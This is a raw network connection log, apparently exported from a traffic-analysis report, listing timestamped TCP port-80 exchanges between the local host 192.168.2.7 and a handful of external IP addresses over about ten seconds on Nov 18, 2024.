                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.527345896 CET6009580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.527415991 CET6009580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.527415991 CET6009580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.532325983 CET806009547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.532360077 CET806009547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.797990084 CET806009418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.798163891 CET6009480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.803594112 CET806009418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.803961992 CET6009480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.812829971 CET6009680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.817888021 CET806009654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.818018913 CET6009680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.818180084 CET6009680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.818180084 CET6009680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.823044062 CET806009654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.823055029 CET806009654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.657604933 CET806009654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.657850027 CET6009680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.663681030 CET806009654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.665724993 CET6009680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.674618959 CET6009780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.681102991 CET806009718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.681754112 CET6009780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.681848049 CET6009780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.681883097 CET6009780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.687063932 CET806009718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.687184095 CET806009718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.993679047 CET806009547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.001661062 CET6009580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.008280039 CET806009547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.009810925 CET6009580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.128411055 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.133985043 CET806009854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.135334969 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.139132977 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.139132977 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.144120932 CET806009854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.144133091 CET806009854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.515743017 CET806009718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.515993118 CET6009780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.521845102 CET806009718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.523787975 CET6009780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.531903028 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.537997961 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.541843891 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.542011023 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.542023897 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.546890974 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.546902895 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.991220951 CET806009854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.991580963 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.997375965 CET806009854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.997432947 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.007093906 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013539076 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013607979 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013789892 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013789892 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.018884897 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.018896103 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.414947987 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.415177107 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.420715094 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.420805931 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.429449081 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434340000 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434554100 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434782028 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434817076 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.439575911 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.439615965 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.679260969 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.679496050 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.684721947 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.684797049 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.691510916 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696332932 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696423054 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696517944 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696536064 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.701409101 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.701749086 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.374505043 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.374813080 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.380162954 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.380321026 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.387526989 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392702103 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392818928 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392973900 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392999887 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.397937059 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.398288012 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.887406111 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.887676954 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.893083096 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.893177032 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.902756929 CET6010480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.907740116 CET806010454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.907901049 CET6010480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.908101082 CET6010480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.908123016 CET6010480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.913532972 CET806010454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.913580894 CET806010454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.250355005 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.250706911 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.257185936 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.257257938 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.265810013 CET6010580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.270838976 CET80601053.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.270934105 CET6010580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.271359921 CET6010580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.272670031 CET6010580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.276251078 CET80601053.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.277611017 CET80601053.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.724329948 CET6010480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.726520061 CET6010680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.731549978 CET806010654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.731631994 CET6010680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.733467102 CET6010680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.733494043 CET6010680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.738341093 CET806010654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.738466978 CET806010654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.931550026 CET80601053.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.931799889 CET6010580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.937154055 CET80601053.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.937232018 CET6010580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.945301056 CET6010780192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.950210094 CET806010735.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.950303078 CET6010780192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.950434923 CET6010780192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.950455904 CET6010780192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.955240011 CET806010735.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.955375910 CET806010735.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.562730074 CET806010654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.562995911 CET6010680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.568507910 CET806010654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.568583012 CET6010680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.576695919 CET6010880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.581769943 CET806010844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.581939936 CET6010880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.582158089 CET6010880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.582190990 CET6010880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.587105989 CET806010844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.587151051 CET806010844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.124810934 CET806010735.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.125020981 CET6010780192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.132101059 CET806010735.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.132219076 CET6010780192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.137931108 CET6010980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.143232107 CET806010918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.143354893 CET6010980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.143457890 CET6010980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.143481970 CET6010980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.149924040 CET806010918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.149969101 CET806010918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.254894972 CET806010844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.255628109 CET6010880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.261208057 CET806010844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.261334896 CET6010880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.271156073 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.276151896 CET8060110172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.276248932 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.276401997 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.276426077 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.281332970 CET8060110172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.281354904 CET8060110172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.832036018 CET806010918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.832312107 CET6010980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.837760925 CET806010918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.837872028 CET6010980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.846040010 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851005077 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851115942 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851247072 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851260900 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.856173992 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.856194019 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.940135956 CET8060110172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.940277100 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.940336943 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.944050074 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.945233107 CET8060110172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.948987007 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.949198008 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.949414015 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.949444056 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.954293966 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.954308033 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.692650080 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.692934036 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.698373079 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.698455095 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.706281900 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711297035 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711457014 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711532116 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711565018 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.716412067 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.716428995 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.724220037 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729255915 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729461908 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729504108 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729532003 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729542017 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729553938 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729607105 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.734375954 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.742276907 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747113943 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747142076 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747198105 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747306108 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747359991 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.751961946 CET806011518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752026081 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752181053 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752208948 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752268076 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752564907 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.757028103 CET806011518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.757040977 CET806011518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.587388992 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.587723970 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.593514919 CET806011454.244.188.177192.168.2.7
